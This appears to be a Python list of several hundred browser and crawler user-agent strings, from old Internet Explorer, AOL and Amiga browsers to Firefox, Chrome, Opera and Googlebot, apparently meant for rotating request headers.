"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.5004; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.5001; Windows NT 5.1; Trident/4.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.5000; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.27; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.27; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.17; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.168; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.168; Windows NT 5.1; Trident/4.0; GTB7.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.130; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.6; AOLBuild 4340.130; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)",
|
||||
"Mozilla/5.0 (X11; U; UNICOS lcLinux; en-US) Gecko/20140730 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
|
||||
"Mozilla/5.0 (X11; U; Linux; de-DE) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
|
||||
"Mozilla/5.0 (Windows; U; ; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
|
||||
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
|
||||
"Mozilla/5.0 (Windows; U; ; en-EN) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
|
||||
"Mozilla/5.0 (X11; U; Linux; ru-RU) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: 802 025a17d)",
|
||||
"Mozilla/5.0 (X11; U; Linux; fi-FI) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: 754 46b659a)",
|
||||
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
|
||||
"Mozilla/5.0 (X11; U; Linux; pt-PT) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.4","Mozilla/5.0 (X11; U; Linux; nb-NO) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.4","Mozilla/5.0 (X11; U; Linux; it-IT) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.4 (Change: 413 12f13f8)","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1","Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0","Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0","Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0","Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0","Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0","Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20121202 Firefox/17.0 Iceweasel/17.0.1","Mozilla/5.0 (compatible; IBrowse 3.0; AmigaOS4.0)","IBrowse/2.4demo (AmigaOS 3.9; 68K)","IBrowse/2.4 (AmigaOS 3.9; 68K)","Mozilla/4.0 (compatible; IBrowse 2.3; AmigaOS4.0)""Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:2.0b4) Gecko/20100818","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330","Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10","Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3","Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1","Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; da-dk) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1","Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3a) Gecko/20021207 Phoenix/0.5","Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
|
||||
"Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
|
||||
"Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
|
||||
"Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
|
||||
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
|
||||
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
|
||||
"Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
|
||||
"Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
|
||||
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
|
||||
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
|
||||
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
|
||||
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
|
||||
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
|
||||
"HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
|
||||
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
|
||||
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
|
||||
"Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
|
||||
"Googlebot/2.1 (http://www.googlebot.com/bot.html)",
|
||||
"Opera/9.20 (Windows NT 6.0; U; en)",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
|
||||
"Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
|
||||
"Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13"
|
||||
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
|
||||
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
|
||||
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
|
||||
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
|
||||
"YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727; Media Center PC 3.0; InfoPath.2)"
|
||||
"AmigaVoyager/2.95 (compatible; MC680x0; AmigaOS; SV1)"
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
|
||||
"Mozilla/5.0 (X11; U; Linux; de-DE) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.8.0"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.4 (Change: )"
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Avant Browser; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
|
||||
"Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Browzar)"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en; rv:1.9.2.14pre) Gecko/20101212 Camino/2.1a1pre (like Firefox/3.6.14pre)"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko, Safari) Cheshire/1.0.UNOFFICIAL"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030111 Chimera/0.6"
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17"
|
||||
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15"
|
||||
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11"
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5"
|
||||
"Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11"
|
||||
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1"
|
||||
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41"
|
||||
"Mozilla/5.0 ArchLinux (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1"
|
||||
"Mozilla/5.0 (X11; Linux amd64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1"
|
||||
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC; en-US; mimic; rv:9.3.0) Gecko/20120117 Firefox/3.6.25 Classilla/CFM"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.5) Gecko/2009011615 Firefox/3.0.5 CometBird/3.0.5"
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Comodo_Dragon/12.1.0.0 Chrome/12.0.742.91 Safari/534.30"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.16) Gecko/20101209 Conkeror/0.9.2 (Debian-0.9.2+git100804-1)"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 3.0.5) ; .NET CLR 3.0.04506.30; InfoPath.2; InfoPath.3; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)"
|
||||
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Crazy Browser 1.x.x)"
|
||||
"Cyberdog/2.0 (Macintosh; PPC)"
|
||||
"Cyberdog/2.0 (Macintosh; 68k)"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Deepnet Explorer 1.5.3; Smart 2x2; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; pl-pl) AppleWebKit/312.8 (KHTML, like Gecko, Safari) DeskBrowse/1.0"
|
||||
"Dillo/2.0"
|
||||
"Dillo/0.8.6-i18n-misc"
|
||||
"Dooble/0.07 (de_CH) WebKit"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ (KHTML, like Gecko) Element Browser 5.0"
|
||||
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)"
|
||||
"ELinks/0.12~pre2.dfsg0-1ubuntu1 (textmode; Debian; Linux 2.6.28-15-generic x86_64; 207x60-2)"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.13) Gecko/2009073022 EnigmaFox/3.0.13"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; it-it) AppleWebKit/534.26+ (KHTML, like Gecko) Ubuntu/11.04 Epiphany/2.30.6"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.14) Gecko/20080528 Ubuntu/9.10 (karmic) Epiphany/2.22 Firefox/3.0"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.8) Gecko/20080528 Fedora/2.24.3-4.fc10 Epiphany/2.22 Firefox/3.0"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en; rv:1.9.0.8) Gecko/20080528 Epiphany/2.22 (Debian/2.24.3-2)"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en; rv:1.9) Gecko/20080528 (Gentoo) Epiphany/2.22 Firefox/3.0"
|
||||
"Mozilla/5.0 (X11; U; FreeBSD i386; en; rv:1.8.1.12) Gecko/20080213 Epiphany/2.20 Firefox/2.0.0.12"
|
||||
"Mozilla/4.0 (compatible; MSIE 5.23; Macintosh; PPC) Escape 5.1.8"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13"
|
||||
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.5) Gecko/20031007 Firebird/0.7"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.5) Gecko/20031026 Firebird/0.7"
|
||||
"Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.5a) Gecko/20030729 Mozilla Firebird/0.6.1"
|
||||
"Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.5) Gecko/20031007 Firebird/0.7"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:2.0) Treco/20110515 Fireweb Navigator/2.4"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Flock/3.5.3.4628 Chrome/7.0.517.450 Safari/534.7"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Flock/3.5.2.4599 Chrome/7.0.517.442 Safari/534.7"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Flock/3.5.0.4568 Chrome/7.0.517.440 Safari/534.7"
|
||||
"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.16) Gecko/2010010314 Firefox/3.0.16 Flock/2.5.6"
|
||||
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; nl-nl) AppleWebKit/532.3+ (KHTML, like Gecko) Fluid/0.9.6 Safari/532.3+"
|
||||
"Galaxy/1.0 [en] (Mac OS X 10.5.6; U; en)"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2.1)"
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko Galeon/2.0.6 (Debian 2.0.6-2.1)"
|
||||
"Mozilla/5.0(X11;U;Linux(x86_64);en;rv:1.9a8)Gecko/2007100619;GranParadiso/3.1"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a7) Gecko/2007080210 GranParadiso/3.0a7"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 GranParadiso/3.0a1"
|
||||
"Mozilla/5.0 (X11; U; Darwin i386; en-US; rv:1.9.0.8) Gecko/2009040414 GranParadiso/3.0.8"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 3.5.21022; GreenBrowser)"
|
||||
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.9 (KHTML, like Gecko) Hana/1.1"
|
||||
"Mozilla/5.0 (Macintosh; U; i386 Mac OS X; en) AppleWebKit/417.9 (KHTML, like Gecko) Hana/1.0"
|
||||
"HotJava/1.1.2 FCS"
|
||||
"HotJava/1.0.1/JRE1.1.x"
|
||||
"IBM WebExplorer /v0.94"
|
||||
"Mozilla/5.0 (compatible; IBrowse 3.0; AmigaOS4.0)"
|
||||
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_8) AppleWebKit/537.3+ (KHTML, like Gecko) iCab/5.0 Safari/533.16"
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8"
|
||||
"Mozilla/5.0 (X11; U; Linux sparc64; es-PY; rv:5.0) Gecko/20100101 IceCat/5.0 (like Firefox/5.0; Debian-6.0.1)"
|
||||
"Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1 Iceweasel/15.0.1"
|
||||
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0"
|
||||
"Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; iRider 2.60.0008; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1250.0 Iron/22.0.2150.0 Safari/537.4"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.21pre) Gecko K-Meleon/1.7.0"
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4pre) Gecko/20070404 K-Ninja/2.1.3"
|
||||
